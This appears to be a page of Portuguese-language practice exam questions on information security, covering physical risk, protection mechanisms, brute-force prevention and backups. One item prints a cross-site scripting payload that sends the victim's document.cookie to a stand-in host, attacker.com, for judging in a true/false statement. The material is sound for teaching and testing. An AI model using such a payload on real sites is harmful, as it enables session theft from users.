Explore as questões disponíveis e prepare-se para seus estudos!
Relativamente a segurança da informação, julgue o item subsequente.
No contexto da segurança física, é classificado como de risco
intermediário um ambiente computacional organizacional que,
sem ter asseguradas as condições mínimas de funcionamento
e processamento das informações, seja capaz de levar a
organização a ter sérios problemas ou incorrer em grandes
prejuízos.
Visando aumentar a segurança das informações, um Analista propôs a utilização dos seguintes mecanismos de proteção lógica, gerenciamento de acesso e proteção física:
I. contempla antivírus, filtros de pacotes, controle de acesso wireless, suporte à Virtual Private Network (VPN) e controle de intrusões na rede, chegando a gerar relatórios com diagnóstico de possíveis ameaças lógicas às quais o centro de dados possa estar vulnerável.
II. submete o usuário a mecanismos de autenticação combinados, pertencentes pelo menos às categorias: conhecimento (something you know), possessão (something you have) e herança (something you are).
III. visa fornecer energia para todos os equipamentos, sendo composto por conjuntos de nobreaks, baterias, inversores e retificadores. Os nobreaks redundantes irão assegurar o suprimento contínuo de energia, mesmo em caso de falha de transformadores ou falta de energia elétrica e as baterias são dimensionadas para garantir uma autonomia por um período mínimo de tempo.
Os mecanismos I, II e III se referem, correta e respectivamente, a
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Limitar o número máximo de tentativas de autenticação
falhadas, ou atrasar progressivamente essa operação, e
registar todas as falhas e alertar os administradores quando
detectados ataques de teste exaustivo ou de força bruta são
formas de prevenir a quebra de autenticação.
No gerenciamento de arquivos audiovisuais, existem estratégias para evitar perda de dados e garantir a integridade dos arquivos.
Nesse contexto, analise as afirmativas a seguir:
I. Armazenar arquivos de áudio e vídeo em um único servidor local proporciona proteção suficiente contra falhas físicas, incêndios, roubo, desastres naturais e ataques cibernéticos.
II. Recomenda-se criar backups em múltiplos locais e armazenamento redundante para arquivos de vídeo e áudio, garantindo proteção contra falhas de hardware, erros humanos e ataques cibernéticos.
III. É aconselhável utilizar pendrive como principal meio de backup, pois são portáteis e permitem acesso rápido aos arquivos em qualquer local.
Está correto o que se afirma em: